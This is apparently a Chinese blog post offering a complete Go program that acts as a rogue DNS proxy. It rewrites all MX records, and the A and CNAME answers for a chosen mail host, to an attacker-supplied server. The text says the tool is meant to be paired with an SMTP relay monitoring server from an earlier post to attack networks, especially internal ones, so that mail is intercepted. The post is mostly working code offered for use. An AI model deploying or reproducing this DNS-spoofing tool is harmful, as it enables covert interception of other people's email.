软件介绍:
本身为独立执行程序,跨平台,可以充当正常dns服务器。默认情况下,本程序只篡改MX(邮件交换记录)为特定主机。
作用:
本软件 与 本博客前文中的 smtp 中继监控服务器程序 结合来实施攻击,特别在内网中。
其他:
如果需要实现高级的基于特定域名的篡改,修改代码即可。
package main
import (
"flag"
"fmt"
"github.com/miekg/dns"
"os"
"strings"
)
var (
remote = "114.114.114.114:53"
local = ":53"
quiet = true
server string
ip string
)
func main() {
s := flag.String("Dom", "mail.yk.com", "请输入所有mx服务器要转发的FQDN(例如:mail.xxx.com)【可选】")
host := flag.String("Add", "127.0.0.1", "请输入所有mx服务器要转发的IP地址(例如:192.168.1.1)")
flag.Parse()
server = *s + "."
ip = *host
dns.HandleFunc(".", proxyServe)
failure := make(chan error, 1)
go func(failure chan error) {
failure <- dns.ListenAndServe(local, "tcp", nil)
}(failure)
go func(failure chan error) {
failure <- dns.ListenAndServe(local, "udp", nil)
}(failure)
fmt.Println(<-failure)
os.Exit(1)
}
func proxyServe(w dns.ResponseWriter, req *dns.Msg) {
defer func() {
if err := recover(); err != nil {
fmt.Println(err)
}
}()
if req.MsgHdr.Response == true { // supposed responses sent to us are bogus
return
}
c := new(dns.Client)
c.Net = "udp"
m, _, err := c.Exchange(req, remote)
if !quiet {
fmt.Println(req)
fmt.Println(m)
}
if err != nil {
fmt.Println(err)
} else {
if m.Question[0].Qtype == 1 { //15 表示A记录
if m.Question[0].Name == server {
n := len(m.Answer)
for i := 0; i < n; i++ {
s := strings.Fields(m.Answer[i].String())
s[4] = ip
m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
}
}
}
if m.Question[0].Qtype == 5 { //=5 表示CN记录
if m.Question[0].Name == server {
n := len(m.Answer)
for i := 0; i < n; i++ {
s := strings.Fields(m.Answer[i].String())
if s[3] == "A" {
s[4] = ip
m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
}
}
}
}
if m.Question[0].Qtype == 15 { //15 表示MX记录
n := len(m.Answer)
for i := 0; i < n; i++ {
s := strings.Fields(m.Answer[i].String())
s[5] = server
m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
}
}
w.WriteMsg(m)
}
}
下载地址: